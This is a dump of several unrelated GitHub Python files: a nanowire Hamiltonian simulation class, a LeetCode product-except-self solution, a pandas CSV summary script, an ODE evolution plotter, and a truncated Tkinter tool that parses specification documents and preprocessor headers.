(+1) * block2\n lower_off_diag_block = -1 / self.dx**2 * 1 / (\n 2 *\n self.eff_mass) * block1 - 1j * self.alpha / self.dx * (-1) * block2\n upper_off_diag = np.array(\n [upper_off_diag_block for site in self.x[1:]])\n lower_off_diag = np.array(\n [lower_off_diag_block for site in self.x[:-1]])\n\n # Next we build hamiltonian such that the diagonal conists of diag_block and the off-diagonal consists of upper_off_diag and lower_off_diag\n offset = 4\n aux = np.empty((0, offset), int)\n\n hamiltonian = block_diag(*diag_block)\n hamiltonian += block_diag(aux, *upper_off_diag, aux.T)\n hamiltonian += block_diag(aux.T, *lower_off_diag, aux)\n\n self.hamiltonian = hamiltonian\n\n return hamiltonian\n\n def get_smallest_eigenvalues_and_vectors(self, num_eigvals):\n order = np.argsort(np.abs(self.eigvals))\n result_eigvals = self.eigvals[order][:num_eigvals]\n result_eigvecs = self.eigvecs[:, order][:, :num_eigvals]\n\n re_order = np.argsort(result_eigvals)\n result_eigvals = result_eigvals[re_order]\n result_eigvecs = result_eigvecs[:, re_order]\n\n return result_eigvals, result_eigvecs\n\n # Function to calculate the absolute value of the wavefunction on each site\n # This corresponds to the sum of the electron and hole and spin up and spin down wavefunctions on each site\n def adjust_global_phase(self, eigvecs):\n angle = np.angle(eigvecs[0])\n return eigvecs * np.exp(-1j * angle)\n\n def calculate_operator_expectation(self, eigvec, operator=None):\n # reshape the 1-d array to a 2-d array with first dimension the number of sites and second the spin degrees of freedom with 4 dimensions\n n_sites = eigvec.shape[0] // 4\n reshaped_eigvec = eigvec.reshape((n_sites, 4))\n\n sigma_0, sigma_x, sigma_y, sigma_z = self.pauli_matrices()\n part_hole_op = np.kron(sigma_y, sigma_y)\n part_hole_op = block_diag(*[part_hole_op for site in self.x])\n\n if operator is None:\n operator = np.kron(np.eye(2), np.eye(2))\n elif operator == \"sigma_z\":\n operator = np.kron(np.eye(2), np.array([[1, 0], [0, -1]]))\n\n abs_wavefunction = np.array(\n [vec.conj().T @ operator @ vec for vec in reshaped_eigvec]).real\n\n return abs_wavefunction\n\n # Calculate the absolute value of the psi_0 + i psi_1 wavefunction on each site and\n def calculate_majorana_wavefunctions(self, eigvecs, phi):\n psi_plus = np.exp(1j * phi) * eigvecs[:, 0] + np.exp(\n -1j * phi) * eigvecs[:, 1]\n psi_minus = 1j * np.exp(1j * phi) * eigvecs[:, 0] - 1j * np.exp(\n -1j * phi) * eigvecs[:, 1]\n # Order array of [psi_plus, psi_minus] after the absolute value of the first entry\n result = np.array([psi_plus, psi_minus]).transpose()\n order = np.argsort(np.abs(result[1]))\n return result[:, order]\n\n def calculate_abs_wavefunctions(self, eigvecs):\n vec_0 = self.calculate_operator_expectation(eigvecs[:, 0])\n vec_1 = self.calculate_operator_expectation(eigvecs[:, 1])\n\n return vec_0, vec_1\n\n # Routine that only calculates the eigenvalues with the smallest absolute value via eigsh\n def calculate_only_smallest_eigenvalues(self,\n num_eigvals=10,\n sigma=0,\n positive_first=False):\n eigvals, eigvecs = eigsh(self.hamiltonian,\n k=num_eigvals,\n which='LM',\n mode='normal',\n sigma=sigma)\n\n self.eigvals = eigvals\n self.eigvecs = eigvecs\n if positive_first and num_eigvals == 2:\n return self.return_smallest_positive_and_negative_eigenvalues_and_vectors(\n )\n else:\n return eigvals, eigvecs\n\n def diagonalize_hamiltonian(self):\n self.eigvals, self.eigvecs = np.linalg.eigh(self.hamiltonian)\n return self.eigvals, self.eigvecs\n\n def return_smallest_positive_and_negative_eigenvalues_and_vectors(self):\n if self.eigvals is None:\n print(\"No eigenvalues calculated yet. Calculating now.\")\n self.calculate_only_smallest_eigenvalues()\n\n # Find positive and negative eigenvalues smallest in amplitude and their eigenvectors\n positive_eigval = np.min(self.eigvals[self.eigvals > 0])\n negative_eigval = np.max(self.eigvals[self.eigvals < 0])\n positive_eigvec = self.eigvecs[:, self.eigvals == positive_eigval]\n negative_eigvec = self.eigvecs[:, self.eigvals == negative_eigval]\n\n eigvals = np.array([positive_eigval, negative_eigval])\n eigvecs = np.concatenate((positive_eigvec, negative_eigvec), axis=1)\n return eigvals, eigvecs\n\n # Routine that compares differen diagonalization methods\n def compare_diagonalization_methods(self):\n self.build_hamiltonian()\n\n print(self.diagonalize_hamiltonian()[0])\n print(self.get_smallest_eigenvalues_and_vectors(4)[0])\n\n eig_arnoldi = self.calculate_only_smallest_eigenvalues(4)[0]\n print(eig_arnoldi)\n\n def pauli_matrices(self):\n sigma_0 = np.array([[1, 0], [0, 1]])\n sigma_x = np.array([[0, 1], [1, 0]])\n sigma_y = np.array([[0, -1j], [1j, 0]])\n sigma_z = np.array([[1, 0], [0, -1]])\n return sigma_0, sigma_x, sigma_y, sigma_z\n","repo_name":"NitschMax/nanowire_simulation","sub_path":"nanowire_hamiltonian_class.py","file_name":"nanowire_hamiltonian_class.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13339281513","text":"\r\n\r\n'''\r\nGiven an integer array nums, return an array answer such that answer[i] is equal to the product of all the elements of nums except nums[i].\r\n\r\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\r\n\r\nYou must write an algorithm that runs in O(n) time and without using the division operation.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,2,3,4]\r\nOutput: [24,12,8,6]\r\nExample 2:\r\n\r\nInput: nums = [-1,1,0,-3,3]\r\nOutput: [0,0,9,0,0]\r\n \r\n\r\nConstraints:\r\n\r\n2 <= nums.length <= 105\r\n-30 <= nums[i] <= 30\r\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\r\n \r\n\r\nFollow up: Can you solve the problem in O(1) extra space complexity? (The output array does not count as extra space for space complexity analysis.)\r\n\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n def productExceptSelf(self, nums):\r\n n = len(nums)\r\n result = [0] * n\r\n \r\n # Calculate left products and store them in the result array\r\n left_product = 1\r\n for i in range(n):\r\n result[i] = left_product\r\n left_product *= nums[i]\r\n \r\n # Calculate right products and multiply with left products\r\n right_product = 1\r\n for i in range(n - 1, -1, -1):\r\n result[i] *= right_product\r\n right_product *= nums[i]\r\n \r\n return result\r\n\r\n# Example usage\r\nnums1 = [1, 2, 3, 4]\r\nsolution = Solution()\r\nresult1 = solution.productExceptSelf(nums1)\r\nprint(\"Output for nums1:\", result1)\r\n\r\nnums2 = [-1, 1, 0, -3, 3]\r\nresult2 = solution.productExceptSelf(nums2)\r\nprint(\"Output for nums2:\", result2)\r\n","repo_name":"PandaFlo/LeetCode","sub_path":"Python/productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25257219001","text":"#seudocodigo\n#1. leer el archivo csv\n#2. Extraer el resumen\n#3. Guardar el resumen en formato csv\n\n\nimport pandas as pd\nimport os\nfrom pathlib import Path\n\n\ndef main():\n #leer archivo\n filename=\"llamadas123_julio_2022.csv\"\n data= get_data(filename= filename)\n #extrae resumen\n df_resumen = get_summary(data)\n #guardar resumen\n save_data(df_resumen, filename)\n\ndef save_data(df, filename):\n out_name= 'resumen2_' + filename\n root_dir= Path(\".\").resolve()\n out_path = os.path.join(root_dir,\"data\", \"processed\",out_name)\n df.to_csv(out_path)\n\ndef get_summary(data):\n dic_resume = dict()\n for col in data.columns:\n valores_unicos =data[col].unique()\n n_valores = len(valores_unicos)\n dic_resume[col]= n_valores\n df_resumen=pd.DataFrame.from_dict(dic_resume,orient='index')\n df_resumen.rename({0:'Count'}, axis=1, inplace=True)\n return df_resumen\n\n\ndef get_data(filename):\n data_dir=\"raw\"\n root_dir =Path(\".\").resolve()\n file_path =os.path.join(root_dir, \"data\", data_dir, filename)\n data=pd.read_csv(file_path, encoding='latin-1',sep=';')\n \n\n return data\n\nif __name__ == '__main__':\n main()","repo_name":"ingvamartinez/ESEIT_BIGDATA","sub_path":"src/etl_resumen_llamadas.py","file_name":"etl_resumen_llamadas.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20927747205","text":"\"\"\"\nEvolution d'un système autonome\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\n\nclass Evolution:\n \"\"\"Gestion de l'évolution d’un système autonome\"\"\"\n def __init__(self, title=\"Evolution du modèle en fonction du temps\",\n figsize=(10, 6)):\n self._title = title\n self._figsize = figsize\n\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, value):\n self._title = value\n\n @property\n def figsize(self):\n return self._figsize\n\n @figsize.setter\n def figsize(self, value):\n self._figsize = value\n\n def __str__(self):\n return self.title\n\n def plot(self, modl, cndszr, xaxis, yaxis, taxis,\n name=\"evol_model\", exprtpng=False):\n \"\"\"\n Représente les composantes du système différentiel\n en fonction du temps\n \"\"\"\n # Préparation figure et axes\n fig = plt.figure(1, figsize=self.figsize)\n nbAxes = len(yaxis)\n axes = [fig.add_subplot(nbAxes, 1, i + 1) for i in range(nbAxes)]\n superpose = nbAxes == 1 # Superposition si un seul axe y donné\n\n # Calcul des trajectoires\n tdisc = np.linspace(taxis.start, taxis.end, taxis.size_subdiv)\n cndszero = cndszr.cnds\n for cnd in cndszero:\n cnd0 = cnd.cords\n trj = odeint(modl.get_rhs(), cnd0, tdisc)\n if superpose: # Cas superposition\n for i in range(trj.shape[1]):\n axes[0].plot(tdisc, trj[:, i], cnd.get_style(),\n label=modl.str_cndzr() + str(cnd0))\n else: # Cas graphiques séparés\n i = 0\n for ax in axes:\n ax.plot(tdisc, trj[:, i], cnd.get_style(),\n label=modl.str_cndzr() + str(cnd0))\n i += 1\n\n # Paramétrages axes\n i = 0\n for ax in axes:\n ax.set_xlim(xaxis.start, xaxis.end)\n ax.set_ylim(yaxis[i].start, yaxis[i].end)\n ax.grid(True)\n ax.legend()\n if superpose:\n ax.set_title(self.title)\n ax.set(xlabel=\"Temps\", ylabel=\", \".join(modl.symb))\n else:\n ax.set_title(f\"{modl.labels[i]} en fonction du temps\")\n ax.set(xlabel=\"Temps\", ylabel=modl.symb[i])\n i += 1\n\n plt.tight_layout()\n plt.show()\n\n if exprtpng:\n figname = name + \".png\"\n figname.replace(' ', '_')\n fig.savefig(\"img/\" + figname)\n","repo_name":"Quentin18/Model-Developpement-Bacteries","sub_path":"pysrc/tools/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73513124073","text":"import shutil\r\nimport pathlib\r\nimport os\r\nimport time\r\nimport logging\r\nimport re\r\n\r\n\r\nHEIGHT = 400\r\nWIDTH = 800\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\n\r\nroot = tk.Tk()\r\nroot.wm_iconbitmap('Collect_Inputs.ico')\r\nroot.wm_title(\"Collect Inputs_V1.0\")\r\ndatatypes = ['boolean','u8','s8','u16','s16','u32','s32','u64','s64','flag','f32','f64','unsigned','signed','uint32','sint32','float','uint16','sint16','uint8','sint8','uint64','sint64','int','char']\r\npp_folder_td4 = 'preprocess_gen\\\\'\r\npp_folder_td5 = 'bld\\\\_incl\\\\'\r\n#Creating an object \r\nlogger=logging.getLogger()\r\nInput_folder_path = \"\"\r\nwork_folder_path = \"\"\r\nvar = tk.IntVar()\r\nv = tk.StringVar()\r\nvalues = {\"TD4\" : \"1\", \r\n \"TD5\" : \"2\"}\r\n \r\nlist_of_NC_to_fetch_frmPP = []\r\n\r\nclass Data:\r\n def __init__(self):\r\n self.name = \"\"\r\n self.mode = \"\"\r\n self.hexR = \"\"\r\n self.phyR = \"\"\r\n self.rsln = 0.0\r\n self.unit = \"\"\r\n self.desc = \"\"\r\n self.isAR = False\r\n self.dimn = 0\r\n self.size = []\r\n self.izmp = False\r\n self.axis = []\r\n\r\ndef identify_DT(hexR):\r\n if (hexR.strip() == \"F32\"):\r\n return 'f32'\r\n elif(hexR.find('\\n') > -1):\r\n return 'u8'\r\n else:\r\n rnge = hexR.strip().split('... ')\r\n lr = int(rnge[0].strip(),16)\r\n ur = int(rnge[1].strip('[ H]'),16) \r\n if lr>ur:\r\n if ur < 256:\r\n return 's8'\r\n elif ur < 65536:\r\n return 's16'\r\n elif ur < 4294967296:\r\n return 's32'\r\n else:\r\n return 's64'\r\n else:\r\n if ur < 256:\r\n return 'u8'\r\n elif ur < 65536:\r\n return 'u16'\r\n elif ur < 4294967296:\r\n return 'u32'\r\n else:\r\n return 'u64'\r\n\r\ndef standardize_rawdata_form(listt):\r\n i=7;\r\n while (i+8) < len(listt):\r\n logger.debug(\"Checking i={}: {}\".format(i,listt[i]))\r\n if listt[i].startswith('IP_') or listt[i].startswith('ID_'):\r\n if listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n else:\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n elif listt[i].startswith('LDP'):\r\n if listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n else:\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n elif listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n else:\r\n pass\r\n i=i+9\r\n return listt\r\n \r\n \r\ndef fetch_NC_def_frmPP(pp_folder_path):\r\n global list_of_NC_to_fetch_frmPP\r\n global logger\r\n nc_set = set()\r\n fetched_ncees = []\r\n with open(os.path.join(pp_folder_path,'all_hash_defines.h'),'w') as wfh:\r\n for root, dirs, files in os.walk(pp_folder_path):\r\n for file in files:\r\n if file.endswith('.h') and (not file.endswith('_mcr.h')) and (not file.endswith('all_actions.h')) and (not file.endswith('all_hash_defines.h')):\r\n with open(os.path.join(root,file),'r') as rfh:\r\n s = \" \"\r\n while s:\r\n try:\r\n s = rfh.readline()\r\n if s.strip().startswith('#define N') or s.strip().startswith('#define\\tN'):\r\n wfh.write(s.strip()+'\\n')\r\n except:\r\n logger.warning(',,{}-{} - Line skipped for parse. It contains unknown chars. FUNC - fetch_NC_def_frmPP\\n'.format(file,s))\r\n nc_set = set(list_of_NC_to_fetch_frmPP)\r\n logger.debug(\"list_of_NC_to_fetch_frmPP: {}\".format(list_of_NC_to_fetch_frmPP))\r\n logger.debug(\"nc_set: {}\".format(nc_set))\r\n with open(os.path.join(pp_folder_path,'all_hash_defines.h'),'r') as rfh:\r\n counter = 1000\r\n for ncees in nc_set:\r\n found = False\r\n rfh.seek(0)\r\n s = \" \"\r\n while s:\r\n s = rfh.readline()\r\n if s.startswith('#define '+ncees) or s.startswith('#define'+'\\t'+ncees):\r\n logger.debug(\"s1: {}\".format(s))\r\n brk_nc = s.strip().split()\r\n logger.debug(\"1\\n\")\r\n if len(brk_nc)>2:\r\n logger.debug(\"2\\n\")\r\n value_uc = brk_nc[2].rstrip('uU')\r\n logger.debug(\"3\\n\")\r\n if value_uc.startswith('0x') or value_uc.startswith('0X') or value_uc.isnumeric():\r\n logger.debug(\"4\\n\")\r\n fetched_ncees.append(s)\r\n found = True\r\n else:\r\n logger.debug(\"5\\n\")\r\n if ncees.startswith('NC_FID') or ncees.startswith('NC_IDX'):\r\n value_1 = counter + 1\r\n counter = counter + 1\r\n else:\r\n value_1 = 2\r\n logger.debug(\"6\\n\")\r\n if ncees.endswith('('):\r\n arr_nc_name = brk_nc[1]\r\n else:\r\n arr_nc_name = ncees\r\n logger.debug(\"6a\\n\")\r\n coment = \"/*{} found with non-numeric value in preprocess_gen. Dummy value here*/\\n\".format(arr_nc_name)\r\n logger.debug(\"6b\\n\")\r\n def_nc1 = coment+'#define'+'\\t'+arr_nc_name+'\\t'+'('+str(value_1)+')'+'\\n'\r\n logger.debug(\"6c\\n\")\r\n fetched_ncees.append(def_nc1)\r\n logger.debug(\"6d\\n\")\r\n found = True\r\n break\r\n if not found:\r\n logger.debug(\"s2: {}\".format(s))\r\n if ncees.startswith('NC_FID') or ncees.startswith('NC_IDX'):\r\n value_1 = counter + 1\r\n counter = counter + 1\r\n else:\r\n value_1 = 2\r\n logger.debug(\"7\\n\")\r\n if ncees.endswith('('):\r\n arr_nc_name1 = ncees + 'i)'\r\n else:\r\n arr_nc_name1 = ncees\r\n coment = \"/*{} not found in preprocess_gen. Dummy value here*/\\n\".format(arr_nc_name1)\r\n def_nc = coment+'#define'+'\\t'+arr_nc_name1+'\\t'+'('+str(value_1)+')'+'\\n'\r\n fetched_ncees.append(def_nc)\r\n return fetched_ncees\r\n\r\ndef Parse_Inputs(rawdata):\r\n logger.info(\",,,Inside Parse_Inputs\\n\")\r\n global list_of_NC_to_fetch_frmPP\r\n tmp_list = []\r\n lis = rawdata.split(chr(7))\r\n logger.debug(\"Adjusting list for MAPS,AXIS,StringData and Conversion tables presence if any\")\r\n logger.info(\",,,Entering standardize_rawdata_form\\n\")\r\n lis = standardize_rawdata_form(lis)\r\n logger.info(\",,,Out of standardize_rawdata_form\\n\")\r\n logger.debug(\"Updated Data list: {}\".format(lis))\r\n length = len(lis)\r\n no_of_data = int((length - 7)/9)\r\n for i in range(0,no_of_data):\r\n dat = Data()\r\n tmp_name = lis[7+i*9]\r\n if lis[7+i*9].count('\\x13')>0:\r\n tmp_name = lis[7+i*9].split('\\x13')[0].strip()\r\n dat.name = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', tmp_name)\r\n dat.mode = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[8+i*9])\r\n dat.hexR = re.sub(r'[\\x00-\\x06,\\x08-\\x09,\\x0B-\\x1F]+', '', lis[9+i*9])\r\n dat.phyR = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[10+i*9])\r\n dat.rsln = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[11+i*9])\r\n dat.unit = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[12+i*9])\r\n dat.desc = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[14+i*9])\r\n if dat.name.count('[')>0:\r\n dat.isAR = True\r\n dat.dimn = dat.name.count('[')\r\n tmp_size = dat.name.split('[')\r\n for j in range(1,len(tmp_size)):\r\n dat.size.append(tmp_size[j].strip('[ ];]'))\r\n for k in dat.size:\r\n if not k.isnumeric():\r\n list_of_NC_to_fetch_frmPP.append(k)\r\n logger.debug(\"dat.size:{}\\n\".format(dat.size))\r\n logger.debug(\"list_of_NC_to_fetch_frmPP:{}\\n\".format(list_of_NC_to_fetch_frmPP))\r\n if dat.name.startswith('NC_') or dat.name.startswith('NLC_'):\r\n if dat.name.find('[')>-1:\r\n name = dat.name[0:dat.name.find('[')].strip()+'('\r\n else:\r\n name = dat.name.strip()\r\n list_of_NC_to_fetch_frmPP.append(name) \r\n elif dat.name.startswith('IP_') or dat.name.startswith('ID_'):\r\n i_for_size = int(i)\r\n elif dat.name.startswith('LDP'):\r\n tmp_list[i_for_size].size.append(dat.mode)\r\n tmp_list[i_for_size].axis.append(dat.name.lower())\r\n tmp_list[i_for_size].dimn += 1\r\n if not dat.mode.isnumeric():\r\n list_of_NC_to_fetch_frmPP.append(dat.mode)\r\n logger.debug(\"list_of_NC_to_fetch_frmPP:{}\\n\".format(list_of_NC_to_fetch_frmPP))\r\n else:\r\n pass\r\n tmp_list.append(dat)\r\n logger.info(\",,,Leaving Parse_Inputs\\n\")\r\n return tmp_list\r\n \r\ndef Parse_ImActions(rawdata):\r\n logger.info(\",,,Inside Parse_ImActions\\n\")\r\n tmp_str = rawdata\r\n tmp_str = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', tmp_str)\r\n actions = tmp_str.split('\\x07\\x07ACTION_')\r\n tmp_actions = []\r\n final_ac_list = []\r\n for i in range(0,len(actions)):\r\n tmp_actions.append('ACTION_'*(i>0)+actions[i])\r\n logger.debug(\"tmp_actions : {}\\n\".format(tmp_actions))\r\n for actns in tmp_actions:\r\n tmp = re.split('[{ ]',actns)\r\n final_ac_list.append(tmp[0])\r\n logger.debug(\"final_ac_list : {}\\n\".format(final_ac_list))\r\n logger.info(\",,,Leaving Parse_ImActions\\n\")\r\n return final_ac_list\r\n\r\ndef fetch_ACTIONdefs_frmPP(pp_folder_path):\r\n actions_dict = dict()\r\n logger.debug(\"Creating action dictionary..\\n\")\r\n with open(os.path.join(pp_folder_path,'all_actions.h'), \"r\") as rfh:\r\n s = \" \"\r\n while s:\r\n s = rfh.readline()\r\n l_split = re.split('[( ]+',s)\r\n if len(l_split)>2:\r\n actions_dict.setdefault(l_split[2], []).append(s)\r\n return actions_dict\r\n\r\ndef spec_parser(specpath,pp_folder_path):\r\n START_HEADER = \"Data Definition\"\r\n ID = \"Input Data\\n\"\r\n CD = \"Calibration Data\\n\"\r\n GI = \"General Information\\n\"\r\n AC = \"Application Conditions\\n\"\r\n IA = \"Import Actions\\n\"\r\n CNFD = \"Configuration Data\\n\"\r\n AD = \"Action Definitions\\n\"\r\n ET = \"Error treatment\\n\"\r\n #Data_Definition = []\r\n Input_Data = []\r\n #Calibration_Data = []\r\n Import_Actions = []\r\n Configuration_Data = []\r\n global list_of_NC_to_fetch_frmPP\r\n list_of_NC_to_fetch_frmPP = []\r\n OpD = False\r\n InD = False\r\n CaD = False\r\n CnD = False\r\n AcD = False\r\n ImA = False\r\n EtD = False\r\n GnI = False\r\n if str(specpath).endswith(\".doc\"):\r\n logger.info(\",,Accessing provided spec path : {}\\n\".format(specpath))\r\n with open(specpath,'r',encoding='ansi') as rfh:\r\n s = \" \"\r\n while s:\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n if s.startswith(START_HEADER):\r\n logger.info(\",,Start header found...\\n\")\r\n OpD = True\r\n break\r\n elif s.startswith('Input Data'):\r\n logger.info(\",,No Output data in module. Input data found..\\n\")\r\n InD = True\r\n break\r\n if OpD is True or InD is True:\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n while s:\r\n if (s.endswith(ID) or s.endswith(CD) or s.endswith(CNFD) or s.endswith(AD) or s.endswith(IA) or s.endswith(ET) or s.endswith(GI) or s.endswith(AC)):\r\n if s.endswith(ID):\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n InD = True\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n elif s.endswith(CD):\r\n if InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n else:\r\n pass\r\n CaD = True\r\n elif s.endswith(CNFD):\r\n if CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n CnD = True\r\n elif s.endswith(AD):\r\n if CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n AcD = True\r\n elif s.endswith(IA):\r\n if AcD is True:\r\n #Action_Definitions = Parse_Inputs(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n ImA = True\r\n elif s.endswith(ET):\r\n if ImA is True:\r\n logger.debug(\"Import_Actions string found...Import_Actions string getting parsed...\\n\")\r\n Import_Actions_str = s\r\n Import_Actions = Parse_ImActions(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif AcD is True:\r\n #Action_Definitions = Parse_ImActions(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n EtD = True\r\n elif s.endswith(GI) or s.endswith(AC):\r\n if EtD is True:\r\n #Error_Treatment = Parse_Inputs(s)\r\n pass\r\n elif ImA is True:\r\n logger.debug(\"Import_Actions string found...Import_Actions string getting parsed...\\n\")\r\n Import_Actions_str = s\r\n Import_Actions = Parse_ImActions(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif AcD is True:\r\n #Action_Definitions = Parse_ImActions(s)\r\n pass\r\n elif CnD is True:\r\n logger.debug(\"Configuration_Data string found...Configuration_Data string getting parsed...\\n\")\r\n Configuration_Data_str = s\r\n Configuration_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif CaD is True:\r\n #logger.debug(\"Calibration_Data string 